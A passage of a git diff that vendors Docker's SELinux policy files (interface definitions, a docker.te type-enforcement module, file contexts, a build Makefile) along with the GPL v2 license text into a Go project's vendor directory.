docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +######################################## +## +## Execute docker_auth_exec_t in the docker_auth domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_auth_domtrans',` + gen_require(` + type docker_auth_t, docker_auth_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) +') + +###################################### +## +## Execute docker_auth in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_exec',` + gen_require(` + type docker_auth_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_auth_exec_t) +') + +######################################## +## +## Connect to docker_auth over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_stream_connect',` + gen_require(` + type docker_auth_t, docker_plugin_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) +') + +######################################## +## +## docker domain typebounds calling domain. +## +## +## +## Domain to be typebound. +## +## +# +interface(`docker_typebounds',` + gen_require(` + type docker_t; + ') + + typebounds docker_t $1; +') + +######################################## +## +## Allow any docker_exec_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`docker_entrypoint',` + gen_require(` + type docker_exec_t; + ') + allow $1 docker_exec_t:file entrypoint; +') diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..4231688382 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te @@ -0,0 +1,399 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type docker_auth_t; +type docker_auth_exec_t; +init_daemon_domain(docker_auth_t, docker_auth_exec_t) + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_plugin_var_run_t; +files_pid_file(docker_plugin_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +docker_auth_stream_connect(docker_t) + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, "docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) +files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) +corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + +fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + +logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +# +# lxc rules +# + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t) +kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + +files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) +files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + systemd_dbus_chat_machined(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + +optional_policy(` + unconfined_domain(docker_t) + unconfined_typebounds(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + # for lxc + virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; + virt_sandbox_entrypoint(docker_t) +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# +allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; +role system_r types spc_t; + +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; +filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") + +optional_policy(` + systemd_dbus_chat_machined(spc_t) +') + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) + virt_sandbox_entrypoint(spc_t) +') + +######################################## +# +# docker_auth local policy +# +allow docker_auth_t self:fifo_file rw_fifo_file_perms; +allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; +dontaudit docker_auth_t self:capability net_admin; + +docker_stream_connect(docker_auth_t) + +manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) + +domain_use_interactive_fds(docker_auth_t) + +kernel_read_net_sysctls(docker_auth_t) + +auth_use_nsswitch(docker_auth_t) + +files_read_etc_files(docker_auth_t) + +miscfiles_read_localization(docker_auth_t) + +sysnet_dns_name_resolve(docker_auth_t) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..d511905c16 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..16df33ef32 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile @@ -0,0 +1,23 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz + +man: install + sepolicy manpage --domain ${TARGETS}_t + +install: + semodule -i ${TARGETS} + diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md new file mode 100644 index 0000000000..7ea3117a89 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md @@ -0,0 +1 @@ +SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..10b7d52a8b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc @@ -0,0 +1,33 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) +/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) +/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) +/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) + +/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.pid -- 